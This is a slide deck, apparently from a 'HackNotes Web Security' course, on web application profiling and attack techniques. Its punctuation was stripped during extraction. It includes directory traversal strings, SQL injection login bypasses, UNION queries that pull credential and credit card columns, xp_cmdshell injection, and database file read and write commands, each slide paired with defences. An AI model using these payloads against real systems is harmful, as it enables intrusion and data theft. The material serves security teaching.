HACKNOTES Web Security

1
HACKNOTES - Web Security
2
Hacking Techniques Defenses

• Web Hacking Penetration Methodologies
• Critical Hacks Defenses

3
Web Hacking Penetration Methodologies

• Threats and Vulnerabilities
• Profiling the Platform
• Profiling the Application
• Summary

4
THREATS AND VULNERABILITIES

• Vulnerabilities
• The platform Linux, Windows, Apache, Oracle
• The application programming errors
• SQL injection
• Session hijacking

5
PROFILING THE PLATFORM

• Web Server Apache, IIS, Netscape
• Application Server Tomcat Servlet, PHP, ASP.NET
• Database Oracle, MSSQL, DB2, Infomix, Sybase.

6
Port Scanning and Service Identification

• Nmap

7
Port Scanning and Service Identification

• Scanline fast but only perform SYN, ICMP and
  UDP scans

8
Port Scanning and Service Identification

• Netcat openssl

openssl s_client connect website443 cipher
EXPORT40 openssl s_client connect website443
cipher NULL openssl s_client connect
website443 cipher HIGH
9
Vulnerability scanning

• Nikto Nessus

10
Platform profile checklist

• Identify the servers role
• Determine the operating system and version
• Determine the operating system and application
  patch level
• Scan for open ports
• Record the web server type, patch level, and
  additional components
• Research known vulnerabilities.

11
PROFILING THE APPLICATION

• The next step is to profile the actual web site
  by systematically cataloging all of its pages,
  functions, and parameter.
• To identify common problems such as poor input
  validation, inadequate session handling, and
  other programming errors.

12
Enumerate the Directory Structure and Files

• Indexex, The easy part is going through the
  application and recording each file name and its
  full path from the web root.
• Teleport, wget
• libwhiskers crawl function

13
Identify Authentication Mechanism
Keep in mind that challenge/response
mechanisms dont protect passwords with 100
percent security
14
Identify Authorization Mechanism

• Identify Authorization Tokens

• http//website/index.php?idallenisadminfalseme
  nubasic
• If the request succeeds, then the application is
  vulnerable to
• horizontal privilege escalation.
• http//website/index.php?idgeorgeisadminfalsem
  enubasic
• If the request doesnt receive administrator
  right, then user impersonation still works,
• but the server tracks authorization in a
  parameter other than id.
• Otherwise, the application performs the
  authorization check based on the username,
• is vulnerable to horizontal and privilege
  escalation.

• http//website/index.php?idmattisadmintruemenu
  full
• if the request succeeds, then the application is
  vulnerable to
• vertical privilege escalation. The attack
  required manipulating multiple tokens,
• but the application still failed to enforce
  strong authorization checks.

• http//website/index.php?idmattisadminfalsomen
  ufull
• if the request succeeds, then the application is
  vulnerable to
• vertical privilege escalation. The application
  doesnt perform any authorization
• checks after the user has authenticated.

• http//website/index.php?idmattisadmintruemenu
  basic
• If the request succeeds, then application is
  vulnerable to vertical privilege escalation.
• The application performs an authorization check
  on the isadmin parameter and
• provides functionality according to the a value.

15
Protect Authorization

• The best defense is to track as many user
  attributes on the server as possible.
• Creating role-based access in a custom database
  table increases application overhead and
  maintenance however, the security requirements
  of the application may require such a technique.

16
Identify All Support Files

• style sheets (.css)
• IIS files that are interpreted by specific ISAPI
  (internet server application programming
  interface) filters, such as .htr, .htx, .idc ,
  .ida and .idq.
• passwd.txt global.asa
• Nikto will identify these common files, but only
  in default locations.

17
Identify All Include Files

• To identify an include file by search for the
  Server Side Include (SSI) tag.
• Virtual
• File
• PHP
• Log

lt!-- include virtual /html/include
/header.inc --gt
lt!-- include file include/header.inc --gt
18
Protect Include Files

• Always use the languages file suffix instead of
  .inc when naming include files.
• If youre using ApacheASP, then you can either
  rename the files to .asp or modify the httpd.conf
  file
• The ltFilesMatchgt trick

lt This line will not be visible if the file
suffix is .asp gt lt! This line will be visible
regardless of the file suffix --gt
19
Enumerate All Forms

• The indicator of a form is the HTML ltformgt tag
  how ever, the salient portions are the input
  type definitions
• Form-based authentication is also a primary
  target for brute-force password-guessing attacks.

ltINPUT TYPEhidden NAMEsess_id VALUE
gt from APBoard ltINPUT TYPEhidden
NAMEpostit VALUETRUEgt ltINPUT TYPEhidden
NAMEinsertinto VALUE1gt ltINPUT TYPEhidden
NAMEBoardID VALUE1gt ltINPUT CLASSbutton
TYPEsumit NAMEnew_topic VALUEThema
postengt ltINPUT CLASSbutton TYPEsumit
NAMEprefiew_topic VALUEVorschaugt
20
Enumerate All GET Parameters

• Many applications track variables through URL
  parameters. The server sets these parameters
  based on user permission level, a users action,
  a session ID, or similar function.
• This can point to the parameters function or its
  relation to session tracking, or it can generate
  informational errors.
• Each GET parameter should also be tested for
  input validation and SQL injection attacks

http//website/main.asp?menuviewprofile
viewprofile, user, welcome, admin, debug
21
Protect Parameters

• If the application uses GET parameters to track
  values then you might consider using POST request
  more often.
• The parameters to a POST request will not show up
  in a browsers history file or bookmarks.

22
Identify Vector forDirectory Attacks

• Directory attacks traversal and listing
• Applications that use templating techniques
• Typical attack
• NULL (00) character
• Try this to bypass scripts that check for file
  extensions or automatically append characters to
  file names.

• http//website/cgi-bin/bb-hostsvc.sh?HOSTSVCwww,w
  ebsite,com.cpu
• http//website/servlet/webacc?User.htmlindex
• http//website/ultraboard.pl?actionPrintableTopic
  Post42

• ../../../../etc/passwd
• ../../conf/httpd.conf
• ../../../../boot.ini
• ../../../../winnt/repair/sam

../../etc/paswd00html
23
Identify Areas that ProvideFile Upload Capability

• File upload introduces several threats to the
  application
• Malicious Content
• File Overwrite
• Denial of Service

24
Identify Errors

• Two steps
• Simply try to generate some errors in the
  application.
• Identify what types of errors are generated on
  the server and how they are displayed to user.

Inserting garbage characters deleting
parameters inserting punctuation
Did it return the servers default HTTP 500
message? Is it a customized error page? Does an
error return a custom page, but an HTTP 200
message? What information does the error
contain? Can you identify path information? What
about internal variables or references to other
files? Is the error related to SQL queries?
25
Protect Error Messages

• Errors can be caught in two locations
• The web or application server
• Change the content of these pages so that it does
  not include any server or application
  information.
• The application itself
• Make sure that the application has proper
  error-handling routines that default to a simple,
  innocuous error message.

26
Determine Which PagesRequire SSL

• Replace all of the https// references with
  http// and see if the application still serves
  the page.
• The server and application should be designed to
  ensure that sensitive files are transmitted via
  SSL.

27
Applicatoin Profile Checklist
28
SUMMARY

• In order to full vet the security of an
  application, it must first be fully profiled.
• This basically involves gathering as much
  information about the platform and the
  application.
• A good profile of the application and knowledge
  of SQL can turn an innocuous error into a severe
  exploit.

29
2 Critical Hacks Defenses

• Generic Input Validation
• Character Encoding
• Alternate Request Methods
• SQL Injection
• Cross-site Scripting
• Token Analysis
• Session Attacks
• XML-Based Services
• Fundamental Application Defenses
• Input Validation
• Summary

30
GENERIC INPUT VALIDATION

• Common input validation tests

31
GENERIC INPUT VALIDATION

• Common input validation tests (cont.)

32
Common Vectors
Consider these vector as well
Example input Validation attack vectors
33
Source Disclosure

• Certain input validation attacks manipulate the
  CGIs file name in order to cause its source to
  be displayed in a users browser.
• Java-based server engines seem to be most
  vulnerable to this type of validation attack
• /foo.jsP
• /foo.js70
• /3f.jsp (directory listing)
• /foo.aspDATA
• /foo.asp.html

34
CHARACTER ENCODING

• URL Encoding (Escaped Characters)
• Unicode

Mask 1 1 0 0 0 0 b7 b6 1 b6 b5 b4 b3 b2 b1 b0
---- first byte ------ ---- second byte
--- Example 0 0 1 0 1 1 1 1 (2F)
b7 b6 b5 b4 b3 b2 b1b0
------ one byte --------- Result 1 1 0 0 0 0 0
0(C0) 1 0 1 0 1 1 1 1(AF) In url c0af
35
Some Useful Unicode-Encoded Characters
36
ALTERNATE REQUEST METHODS

• SPIKE proxy
• http//www.immunitysec.com/resources-freesoftware.
  shtml
• GET, POST, BROWSE, CONNECT, COPY, DELETE, HEAD,
  LOCK, MKCOL, MOVE, OPTIONS, PROPFIND, RPOPPATCH,
  PUT, SEARCH, TRACE, and UNLOCK.

37
SQL INJECTION
URL HTTP.GetFromUser() user_id
URL.parameter(user_id) password
URL.parameter(password) query SELECT name
FROM userlist WHERE uid user_id AND
pwd password database.connect() resul
t databasae.execute(query) if
resule HTTP.Send(Login successful. Welcome,
result) IsAuthenticated true else
HTTP.Send(User ID or password is
incorrect.) isAuthenticated false end if if
IsAuthenticated HTTP.Send(MainMenu) end if
https//website/login.cgi?user_iddcooperpassword
diane
https//website/login.cgi?user_iddcooper20--
38
SELECT Statement Manipulation

• https//website/login.cgi?user_iddcooperpassword
  20OR203d
• https//website/login.cgi?user_iddcooperpassword
  foo20OR2013d1
• https//website/login.cgi?user_id20OR203d
  password20OR203d
• https//website/login.cgi?user_id25--

SELECt name FROM userlist WHERE uiddcooper AND
pwd OR
SELECT name FROM userlist WHERE uiddcooper AND
pwdfoo OR 11
SELECT name FROM userlist WHERE uid OR
AND pwd OR
SELECT name FROM userlist WHERE uid -- AND
pwd
39
Retrieve Arbitrary Data with SELECT plus UNION

• SELECT value(s) FROM table WHERE clause_false
  UNION ALL SELECT value(s) FROM other_table WHERE
  clause_true

https//website/login.cgi?user_idfoopasswordU
NION ALLSELECTuid,pwdFROMuserlistWHERE3d

SELECT name FROM userlist WHERE uidfoo AND
pwd UNION ALL SELECT uid, pwd FROM userlist
WHERE
https//website/login.cgi?user_idfoopassword27
UNIONALL SELECTfirst5fname2clastfname2ccca
rdFROMstore WHERE27273d2727
SELECT name FROM userlist WHERE uidfoo AND
pwd UNION ALL SLEECT first_name,last_name,ccard
FROM store WHERE
SELECT name FROM userlist WHERE uidfoo AND
pwdbar UNION ALL SELECT first name, last name,
ccard FROM store WHERE 11
40
Use INSERT to Modify Data

• INSERT INTO user (User,Password) VALUES
  (albert,camus)

https//website/login.cgi?user_idpassword27I
NSERTINTOuserlist 28uid2cpassword29VALUES2
827albert272c27camus2729--
SELECT name FROM userlist WHERE uid AND
pwd INSERT INTO userlist (uid,password)
VALUES (albert,camus)--
41
Salient Information for Common Databases
42
Common SQL Injection String
43
SQL Injection Countermeasures

• Use strongly typed variables and database column
  definitions.
• Assign query results to a strongly typed
  variable.
• Limit data lengths.
• Avoid creating queries via string concatenation.
• Apply data separation and role-based access
  within the database.

http//website/votw/analysis.asp?voteid_at__at_version
Microsoft OLE DB Provider for SQL Server error
80040e57 Arithmetic overflow error converting
nvarchar to data type numeric. /vote/analysis.asp,
line 19
SELECT something FROM table WHERE varable
44
Microsoft SQL Server

• Insert a single quote () into URL parameters and
  then examine the output, HTML source, or even the
  URL parameters for a tell-tale sign.
• In addition to the slew of attacks that can be
  performed against any SQL-based database, MSSQL
  server contains a set of very powerful and
  dangerous commands.

EXEC master.xp_cmdshell command
https//website/vuln.cgi?paramxp_cmdshellipco
nfig/all--
45
High-Risk Stored Procedures in MSSQL
46
Useful Objects and Variables
47
Oracle
Informational Oracle parameters
show parameters control_files
CREATE DIRECTORY somedir AS /path/to/dir CREATE
TABLE foo (bar varchars2(20)) ORGANIZATION
EXTERNAL (TYPE oracle_loader DEFAULT DIRECTORY
somedir LOCATION (somefile.dat))
DECLARE fh UTL_FILE.FILE_TYPE BEGIN fh
UTL_FILE.fopen(/some/dir,file.name,W) --
wite UTL_FILE.PUTF(fh, somedata) UTL_FILE.FCLOSE(
fh) END
48
MySQL Read from the File System
mysqlgt CREATE TABLE foo (bar TEXT) Query OK, 0
rows affected (0.02 sec) mysqlgt LOAD DATA INFILE
/etc/passwd INTO TABLE foo Query OK, 27 rows
affected (0.02 sec) Records 27 Deleted 0
Skipped 0 Warnings 0 mysqlgt SELECT FROM foo
bar ----------------------------------------------
----------------------- rootx00root/root/bin
/bash mikex500500mike/home/mike/bin/bash mys
qlx7878MySQL server/var/lib/mysql/bin/bash p
ostgresx7979system user/var/lib/pgsql/bin/ba
sh
https//website/vuln.cgi?param27CREATETABLEf
oo28barTEXT29 https//website/vuln.cgi?param
27LOADDATAINFILE272fetc2fpasswd27INTOT
ABLEfoo https//website/vuln.cgi?param27SELE
CT2aFROMfoo
49
MySQL Write to the File System
Create a DoS By taking up disk space
SELECT FROM employees INTO OUTFILE /tmp/foo
https//website/vuln.cgi?param27SELECT2aFRO
M employeesINTOOUTFILE272ftmp/2f..0827
melnibone ls la /tmp drwxrwxrwx 8 root
root 4096 jan 16 1628 . drwxrwxrwx 19 root
adm 4096 jan 16 1403 .. drwxrwxrwx 1 mysql
mysql 1269 jan 16 1628 ..
melnibone ls la /tmp cat -tve drwxrwxrwx
8 root root 4096 jan 16 1628
./ drwxrwxrwx 19 root adm 4096 jan 16
1403 ../ drwxrwxrwx 1 mysql mysql 1269 jan
16 1628 ..H
50
PostgreSQL File Read/Write Access with COPY
test CREATE TABLE foo (bar TEXT) CREATE test
COPY foo FROM /etc/passwd COPY test SELECT
FROM foo bar ----------------------------------
----------------------------------- rootx00roo
t/root/bin/bash mikex500500mike/home/mike/
bin/bash mysqlx7878MySQL server/var/lib/mysql
/bin/bash postgresx7979system
user/var/lib/pgsql/bin/bash (27 rows) test
COPY foo FROM /var/lib/pgsql/data/pg_hba.conf
COPY foo TO /var/lib/pgsql/data/pg_hba.conf COP
Y foo TO /tmp/table_data COPY pg_shadow TO
/tmp/foo
51
MySQL PostgreSQL Protect the File System

• Running the application in a low-privilege
  account.
• Limits the exposure of important system
  configuration files and binaries.
• chroot or jail environments.
• Protect system files.